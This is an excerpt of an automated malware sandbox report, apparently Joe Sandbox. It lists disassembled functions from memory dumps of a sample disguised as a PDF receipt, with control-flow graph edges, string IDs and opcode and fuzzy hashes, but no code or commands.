                                                                                                                                                          control_flow_graph 773 eb29ec-eb29f6 775 eb29f8-eb2a01 773->775 776 eb2981-eb298a 773->776 777 eb2990-eb2999 775->777 778 eb2a03-eb2a3b 775->778 776->777 783 eb29a0-eb29c8 777->783 781 eb2a5d-eb2aac 778->781 782 eb2a3d-eb2a5c 778->782 788 eb2aae-eb2ab5 781->788 789 eb2ac7-eb2acf 781->789 790 eb2abe-eb2ac5 788->790 791 eb2ab7-eb2abc 788->791 792 eb2ad2-eb2ae6 789->792 790->792 791->792 795 eb2ae8-eb2aef 792->795 796 eb2afc-eb2b04 792->796 797 eb2af1-eb2af3 795->797 798 eb2af5-eb2afa 795->798 799 eb2b06-eb2b0a 796->799 797->799 798->799 801 eb2b6a-eb2b6d 799->801 802 eb2b0c-eb2b21 799->802 803 eb2b6f-eb2b84 801->803 804 eb2bb5-eb2bbb 801->804 802->801 810 eb2b23-eb2b26 802->810 803->804 814 eb2b86-eb2b8a 803->814 805 eb2bc1-eb2bc3 804->805 806 eb36b6 804->806 805->806 808 eb2bc9-eb2bce 805->808 811 eb36bb-eb3700 806->811 812 eb3664-eb3668 808->812 813 eb2bd4 808->813 815 eb2b28-eb2b2a 810->815 816 eb2b45-eb2b63 call eb02c8 810->816 841 eb372e-eb3874 811->841 842 eb3702-eb3728 811->842 818 eb366a-eb366d 812->818 819 eb366f-eb36b5 812->819 813->812 820 eb2b8c-eb2b90 814->820 821 eb2b92-eb2bb0 call eb02c8 814->821 815->816 822 eb2b2c-eb2b2f 815->822 816->801 818->811 818->819 820->804 820->821 821->804 822->801 826 eb2b31-eb2b43 822->826 826->801 826->816 921 eb38a6-eb38a9 841->921 922 eb3876-eb3878 841->922 842->841 925 eb38aa-eb38bc 921->925 922->925 926 eb387a-eb38a3 922->926 933 eb38ee-eb38f4 925->933 934 eb38be-eb38eb 925->934 926->921 939 eb3928-eb3937 933->939 940 eb38f6-eb3908 933->940 934->933 942 eb393a-eb393d 939->942 940->942 953 eb390a-eb390c 940->953 946 eb393e-eb3941 942->946 950 eb3942-eb39e8 946->950 953->946 957 eb390e-eb3910 953->957 957->950 960 eb3912-eb3927 957->960 960->939
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Xoq$Xoq$Xoq$Xoq
                                                                                                                                                          • API String ID: 0-1961338500
                                                                                                                                                          • Opcode ID: 653a7093f1f51915d5e11deae2795fdfcba510209000860e54ed1a8d5ed7ca77
                                                                                                                                                          • Instruction ID: f1d9d9b6591dc28eee5958bb395a8357a7f819de4693ad148b15f440ea77fa55
                                                                                                                                                          • Opcode Fuzzy Hash: 653a7093f1f51915d5e11deae2795fdfcba510209000860e54ed1a8d5ed7ca77
                                                                                                                                                          • Instruction Fuzzy Hash: E4F18AE194C3A5CBCB158674486B2FBBFA1AF51300B34759FC04373186D9299B09EB93
                                                                                                                                                          Function 00EBA088 Relevance: 3.4, Strings: 2, Instructions: 900COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (okq$4'kq
                                                                                                                                                          • API String ID: 0-1210385896
                                                                                                                                                          • Opcode ID: 3e0753f65dc5f8a10a15290c0fe02dfed48256f6d4580f83b3293a5667212624
                                                                                                                                                          • Instruction ID: e67c7eb8918a9f90ddfd13f09633a85bd6bb1fc4d50378a37b4dc3bc00b01021
                                                                                                                                                          • Opcode Fuzzy Hash: 3e0753f65dc5f8a10a15290c0fe02dfed48256f6d4580f83b3293a5667212624
                                                                                                                                                          • Instruction Fuzzy Hash: 4D824A70A00209DFCF15CFA8C584AEEBBF2BF88314F199569E405AB265D735ED41CB62
                                                                                                                                                          Function 00EB69A0 Relevance: 3.0, Strings: 2, Instructions: 517COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (okq$Hoq
                                                                                                                                                          • API String ID: 0-4134915641
                                                                                                                                                          • Opcode ID: af4bc849df21eaa1a88e9b94cf4a56a0d60932f72494fcf7b065b4a030a7802b
                                                                                                                                                          • Instruction ID: 35f6a9304abe5acea80588f20d1b27d4841e209fb95239fa1f2c94843ba2ca37
                                                                                                                                                          • Opcode Fuzzy Hash: af4bc849df21eaa1a88e9b94cf4a56a0d60932f72494fcf7b065b4a030a7802b
                                                                                                                                                          • Instruction Fuzzy Hash: C9125A70B002199FCB14DF69C894AAEBBF6FF88304F248569E445AB395DB399D41CB90
                                                                                                                                                          Function 00EB3AA1 Relevance: 2.8, Strings: 2, Instructions: 308COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Xoq$Xoq
                                                                                                                                                          • API String ID: 0-251439590
                                                                                                                                                          • Opcode ID: 73f60a8f8f5806c48e58947b31d2ddcc6473e5bec30734524151ebf36c384552
                                                                                                                                                          • Instruction ID: dcd6b7c6ceb6094910dbee57f2a795d691f9bb87a1423c36a1774628382505f6
                                                                                                                                                          • Opcode Fuzzy Hash: 73f60a8f8f5806c48e58947b31d2ddcc6473e5bec30734524151ebf36c384552
                                                                                                                                                          • Instruction Fuzzy Hash: EE913E1268D3D58FDB5146B848EF1F7BFA19B5231071964BFC48377047E9184B09EBA2
                                                                                                                                                          Function 055CF868 Relevance: .3, Instructions: 296COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a8638889f6a66d05ed04cd4e96eab24e8fcecb7fd60f097dc7fdd6f70c7f885d
                                                                                                                                                          • Instruction ID: db280ac5dc4a69c785eda9dfe60ee33e7b9cd85e6e292b07724ff1c6f227e507
                                                                                                                                                          • Opcode Fuzzy Hash: a8638889f6a66d05ed04cd4e96eab24e8fcecb7fd60f097dc7fdd6f70c7f885d
                                                                                                                                                          • Instruction Fuzzy Hash: 32E1BF74E01218CFEB64DFA5D984B9DBBB2FF89304F2081AAD409A7394DB355A85CF50
                                                                                                                                                          Function 067DE0C8 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a035de0cd49b3310fb39526a2e3a81e5045664d5bf37c6d99265e59212bbcde6
                                                                                                                                                          • Instruction ID: 753a768300b49d816396a24d08622d4b0d7d8b1e485898cb4de8a4eee68ac7bc
                                                                                                                                                          • Opcode Fuzzy Hash: a035de0cd49b3310fb39526a2e3a81e5045664d5bf37c6d99265e59212bbcde6
                                                                                                                                                          • Instruction Fuzzy Hash: F3D18D74E00218CFDB54DFA5D984BAEBBB2FF89300F1085A9D419AB364DB359A85CF50
                                                                                                                                                          Function 067D4860 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 49e896a3fb637f4256c1de1f6445f264024c6448ac8e3883a390ed51c77a2ded
                                                                                                                                                          • Instruction ID: 286e2379bf7d35781a8e726809e5db65073064eb8856764185bbc91bed54c99a
                                                                                                                                                          • Opcode Fuzzy Hash: 49e896a3fb637f4256c1de1f6445f264024c6448ac8e3883a390ed51c77a2ded
                                                                                                                                                          • Instruction Fuzzy Hash: 9CD1AD74E01218CFDB54DFA9D984B9DBBB2FF89300F1085A9D409AB368DB319985CF51
                                                                                                                                                          Function 055CAB50 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 578174e1f0870f11ad14fbc0d4e84fa196d0d808460410f5ad44166bf06b7131
                                                                                                                                                          • Instruction ID: 9a1c3c8285073a9bfd399fda39f549589083fbf8b24fdfd05d40fa82132af12c
                                                                                                                                                          • Opcode Fuzzy Hash: 578174e1f0870f11ad14fbc0d4e84fa196d0d808460410f5ad44166bf06b7131
                                                                                                                                                          • Instruction Fuzzy Hash: D6C19F74E01218CFDB14DFA5D984B9DBBB2FF89300F1081A9E809A7369DB359A85CF50
                                                                                                                                                          Function 055CAFA3 Relevance: .2, Instructions: 225COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a3290be72a1934773f37e253ce97c7fd4fd65034df3013e59a72e02ca5ede7ca
                                                                                                                                                          • Instruction ID: 13a025e7d204238495a66a796610284f56c78a9aea520a8ee05cd59fb015d046
                                                                                                                                                          • Opcode Fuzzy Hash: a3290be72a1934773f37e253ce97c7fd4fd65034df3013e59a72e02ca5ede7ca
                                                                                                                                                          • Instruction Fuzzy Hash: B8A1F370E002088FDB14DFA9D989BDDBBB1FF88310F209269E409BB2A1DB745985CF50
                                                                                                                                                          Function 055CAFB0 Relevance: .2, Instructions: 220COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4057664310bbd7a182d9de0b5b3a663c8f83491aabadd874728269c468816ca3
                                                                                                                                                          • Instruction ID: 294b02d70eb3e50ecd30e08a245b74bdd3fad102aca89c08a7c8d355b7432bee
                                                                                                                                                          • Opcode Fuzzy Hash: 4057664310bbd7a182d9de0b5b3a663c8f83491aabadd874728269c468816ca3
                                                                                                                                                          • Instruction Fuzzy Hash: CAA1F470E00608CFDB14DFA9D989B9DBBB1FF88310F209269E419BB2A1DB745985CF51
                                                                                                                                                          Function 055CB2F6 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f915e0245a86fed8cbc929f0f3941a4ad932ca0acaa80ef2d240888870f04416
                                                                                                                                                          • Instruction ID: 6cd554c64e33fc5552d38436d65fdcb88ed2404f3c5814d9b907a3f9acc810d0
                                                                                                                                                          • Opcode Fuzzy Hash: f915e0245a86fed8cbc929f0f3941a4ad932ca0acaa80ef2d240888870f04416
                                                                                                                                                          • Instruction Fuzzy Hash: 2D91E570E00608CFDB14DFA8D889B9DBBB1FF89310F249299E409BB291DB749985CF55
                                                                                                                                                          Function 067DDFB8 Relevance: .2, Instructions: 188COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b4e75b8df6afec59fea72a7e19c13f2475e7925cbc8f9b8cca9d7bc3270d40a6
                                                                                                                                                          • Instruction ID: 632caa53d64b3a06f3bbd683cec8aa15cd1ce7c3addc7b804ac60ed37adc3fe1
                                                                                                                                                          • Opcode Fuzzy Hash: b4e75b8df6afec59fea72a7e19c13f2475e7925cbc8f9b8cca9d7bc3270d40a6
                                                                                                                                                          • Instruction Fuzzy Hash: E6514C70D10A088FCF96DFA9D9486EDBBF2AB86240F60C969D528AF255DF305946CF10
                                                                                                                                                          Function 00EBE988 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 01d8cff4d39070210678fb6723f9029c14572a7652f3e0922dcff9bf3a03204c
                                                                                                                                                          • Instruction ID: 7ecdc81a406b6bb757bc5de339d51be73d9fa083dca69f6b937a5860ae43ab16
                                                                                                                                                          • Opcode Fuzzy Hash: 01d8cff4d39070210678fb6723f9029c14572a7652f3e0922dcff9bf3a03204c
                                                                                                                                                          • Instruction Fuzzy Hash: 4951A574E01208DFDB18DFAAD994A9EBBB6FF88300F249029E815BB364DB315845CF50
                                                                                                                                                          Function 00EBE97A Relevance: .1, Instructions: 147COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 37fc9645abf033fcb28287a55102de7a4f91a5facfe3a00cc53e661a36470474
                                                                                                                                                          • Instruction ID: 71f2b829a8a5952765a79acba5673b3dc138a51b02691d43ca6d7baafb782728
                                                                                                                                                          • Opcode Fuzzy Hash: 37fc9645abf033fcb28287a55102de7a4f91a5facfe3a00cc53e661a36470474
                                                                                                                                                          • Instruction Fuzzy Hash: 32519574E01208DFDB18DFAAD994A9EBBB6BF88300F249129E815BB364DB355845CF50
                                                                                                                                                          Function 067D484F Relevance: .1, Instructions: 119COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 666e18a411c1c2050c0d6de65c7f51c53b32f426e350ccfd121322fe311445a0
                                                                                                                                                          • Instruction ID: 4987c3659196092a87d416070b07d2d105016f8607974a610e86bd09eb346f8e
                                                                                                                                                          • Opcode Fuzzy Hash: 666e18a411c1c2050c0d6de65c7f51c53b32f426e350ccfd121322fe311445a0
                                                                                                                                                          • Instruction Fuzzy Hash: F341F571E01248CFDB58DFAAD8446EEFBF2AF89300F14D52AD418AB258EB345946CF50
                                                                                                                                                          Function 00EB76F1 Relevance: 10.5, Strings: 8, Instructions: 477COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 eb76f1-eb7725 1 eb772b-eb774e 0->1 2 eb7b54-eb7b58 0->2 11 eb77fc-eb7800 1->11 12 eb7754-eb7761 1->12 3 eb7b5a-eb7b6e 2->3 4 eb7b71-eb7b7f 2->4 9 eb7b81-eb7b96 4->9 10 eb7bf0-eb7c05 4->10 18 eb7b98-eb7b9b 9->18 19 eb7b9d-eb7baa 9->19 20 eb7c0c-eb7c19 10->20 21 eb7c07-eb7c0a 10->21 15 eb7848-eb7851 11->15 16 eb7802-eb7810 11->16 24 eb7763-eb776e 12->24 25 eb7770 12->25 22 eb7c67 15->22 23 eb7857-eb7861 15->23 16->15 30 eb7812-eb782d 16->30 26 eb7bac-eb7bed 18->26 19->26 27 eb7c1b-eb7c56 20->27 21->27 31 eb7c6c-eb7c9c 22->31 23->2 28 eb7867-eb7870 23->28 32 eb7772-eb7774 24->32 25->32 75 eb7c5d-eb7c64 27->75 35 eb787f-eb788b 28->35 36 eb7872-eb7877 28->36 55 eb783b 30->55 56 eb782f-eb7839 30->56 59 eb7c9e-eb7cb4 31->59 60 eb7cb5-eb7cbc 31->60 32->11 39 eb777a-eb77dc 32->39 35->31 37 eb7891-eb7897 35->37 36->35 43 eb7b3e-eb7b42 37->43 44 eb789d-eb78ad 37->44 87 eb77de 39->87 88 eb77e2-eb77f9 39->88 43->22 48 eb7b48-eb7b4e 43->48 57 eb78af-eb78bf 44->57 58 eb78c1-eb78c3 44->58 48->2 48->28 62 eb783d-eb783f 55->62 56->62 63 eb78c6-eb78cc 57->63 58->63 62->15 70 eb7841 62->70 63->43 71 eb78d2-eb78e1 63->71 70->15 72 eb798f-eb79ba call eb7538 * 2 71->72 73 eb78e7 71->73 90 eb79c0-eb79c4 72->90 91 eb7aa4-eb7abe 72->91 77 eb78ea-eb78fb 73->77 77->31 79 eb7901-eb7913 77->79 79->31 82 eb7919-eb7931 79->82 144 eb7933 call eb80c9 82->144 145 eb7933 call eb80d8 82->145 146 eb7933 call eb8065 82->146 147 eb7933 call eb7ff4 82->147 148 eb7933 call eb7fb4 82->148 84 eb7939-eb7949 84->43 86 eb794f-eb7952 84->86 92 eb795c-eb795f 86->92 93 eb7954-eb795a 86->93 87->88 88->11 90->43 94 eb79ca-eb79ce 90->94 91->2 111 eb7ac4-eb7ac8 91->111 92->22 95 eb7965-eb7968 92->95 93->92 93->95 98 eb79d0-eb79dd 94->98 99 eb79f6-eb79fc 94->99 100 eb796a-eb796e 95->100 101 eb7970-eb7973 95->101 114 eb79df-eb79ea 98->114 115 eb79ec 98->115 103 eb79fe-eb7a02 99->103 104 eb7a37-eb7a3d 99->104 100->101 102 eb7979-eb797d 100->102 101->22 101->102 102->22 109 eb7983-eb7989 102->109 103->104 110 eb7a04-eb7a0d 103->110 106 eb7a49-eb7a4f 104->106 107 eb7a3f-eb7a43 104->107 112 eb7a5b-eb7a5d 106->112 113 eb7a51-eb7a55 106->113 107->75 107->106 109->72 109->77 116 eb7a0f-eb7a14 110->116 117 eb7a1c-eb7a32 110->117 118 eb7aca-eb7ad4 call eb63e0 111->118 119 eb7b04-eb7b08 111->119 120 eb7a5f-eb7a68 112->120 121 eb7a92-eb7a94 112->121 113->43 113->112 122 eb79ee-eb79f0 114->122 115->122 116->117 117->43 118->119 132 eb7ad6-eb7aeb 118->132 119->75 124 eb7b0e-eb7b12 119->124 127 eb7a6a-eb7a6f 120->127 128 eb7a77-eb7a8d 120->128 121->43 129 eb7a9a-eb7aa1 121->129 122->43 122->99 124->75 130 eb7b18-eb7b25 124->130 127->128 128->43 135 eb7b27-eb7b32 130->135 136 eb7b34 130->136 132->119 141 eb7aed-eb7b02 132->141 138 eb7b36-eb7b38 135->138 136->138 138->43 138->75 141->2 141->119 144->84 145->84 146->84 147->84 148->84
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (okq$(okq$(okq$(okq$(okq$(okq$,oq$,oq
                                                                                                                                                          • API String ID: 0-2636989756
                                                                                                                                                          • Opcode ID: 5283ef53b3c01715d2aa445d4ac277eed1845432d3b947855997bc20866dfe20
                                                                                                                                                          • Instruction ID: 6e49e22bb4af02cc401a1d280d9a0ab8f158254b06e6798529edf788f3847613
                                                                                                                                                          • Opcode Fuzzy Hash: 5283ef53b3c01715d2aa445d4ac277eed1845432d3b947855997bc20866dfe20
                                                                                                                                                          • Instruction Fuzzy Hash: 09123A30A042498FCB24CF68D984ADEBBF2FF88314F259559E885AB6A1D730ED41CF50
                                                                                                                                                          Function 00EB8490 Relevance: 3.2, Strings: 2, Instructions: 707COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1395 eb8490-eb897e 1470 eb8ed0-eb8f05 1395->1470 1471 eb8984-eb8994 1395->1471 1476 eb8f11-eb8f2f 1470->1476 1477 eb8f07-eb8f0c 1470->1477 1471->1470 1472 eb899a-eb89aa 1471->1472 1472->1470 1473 eb89b0-eb89c0 1472->1473 1473->1470 1475 eb89c6-eb89d6 1473->1475 1475->1470 1478 eb89dc-eb89ec 1475->1478 1488 eb8f31-eb8f3b 1476->1488 1489 eb8fa6-eb8fb2 1476->1489 1479 eb8ff6-eb8ffb 1477->1479 1478->1470 1480 eb89f2-eb8a02 1478->1480 1480->1470 1482 eb8a08-eb8a18 1480->1482 1482->1470 1484 eb8a1e-eb8a2e 1482->1484 1484->1470 1485 eb8a34-eb8a44 1484->1485 1485->1470 1487 eb8a4a-eb8a5a 1485->1487 1487->1470 1490 eb8a60-eb8ecf 1487->1490 1488->1489 1494 eb8f3d-eb8f49 1488->1494 1495 eb8fc9-eb8fd5 1489->1495 1496 eb8fb4-eb8fc0 1489->1496 1504 eb8f4b-eb8f56 1494->1504 1505 eb8f6e-eb8f71 1494->1505 1502 eb8fec-eb8fee 1495->1502 1503 eb8fd7-eb8fe3 1495->1503 1496->1495 1506 eb8fc2-eb8fc7 1496->1506 1502->1479 1503->1502 1515 eb8fe5-eb8fea 1503->1515 1504->1505 1517 eb8f58-eb8f62 1504->1517 1507 eb8f88-eb8f94 1505->1507 1508 eb8f73-eb8f7f 1505->1508 1506->1479 1511 eb8ffc-eb901e 1507->1511 1512 eb8f96-eb8f9d 1507->1512 1508->1507 1519 eb8f81-eb8f86 1508->1519 1521 eb902e 1511->1521 1522 eb9020 1511->1522 1512->1511 1516 eb8f9f-eb8fa4 1512->1516 1515->1479 1516->1479 1517->1505 1525 eb8f64-eb8f69 1517->1525 1519->1479 1524 eb9030-eb9031 1521->1524 1522->1521 1527 eb9027-eb902c 1522->1527 1525->1479 1527->1524
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $kq$$kq
                                                                                                                                                          • API String ID: 0-3550614674
                                                                                                                                                          • Opcode ID: 857ddcc27dbf4664f5160f9f9dd9d3ec6c23b138e052978e8b00cfd69c488571
                                                                                                                                                          • Instruction ID: 8e36b9e9c75a2dbc1be0b4260da8939f875015c8e9c99f6da7c0cd21ec7be5b3
                                                                                                                                                          • Opcode Fuzzy Hash: 857ddcc27dbf4664f5160f9f9dd9d3ec6c23b138e052978e8b00cfd69c488571
                                                                                                                                                          • Instruction Fuzzy Hash: D552FE74A00218CFEB24ABA4C950BEEBB76FB94300F1091A9D10A77365DF359E85DF51
                                                                                                                                                          Function 00EB5F38 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Hoq$Hoq
                                                                                                                                                          • API String ID: 0-3106737575
                                                                                                                                                          • Opcode ID: 2a237a41a19e464cfcf709e6d937e7824361a7babf099eeca3393b46ae7adafe
                                                                                                                                                          • Instruction ID: dcbaef6becbc4583d84616248757904cf2247473c5650dd4b1a1f65b837de7e4
                                                                                                                                                          • Opcode Fuzzy Hash: 2a237a41a19e464cfcf709e6d937e7824361a7babf099eeca3393b46ae7adafe
                                                                                                                                                          • Instruction Fuzzy Hash: 99B1BB307042108FDB25AF39D854BBB7BE6AF88314F189569E946EB3A5DB39CC41C790
                                                                                                                                                          Function 00EB6498 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ,oq$,oq
                                                                                                                                                          • API String ID: 0-3825397795
                                                                                                                                                          • Opcode ID: 1b4f5e02ca53251b0196cdc885e01e057232d8ca017c5a0c020e7e7dd9d69ccf
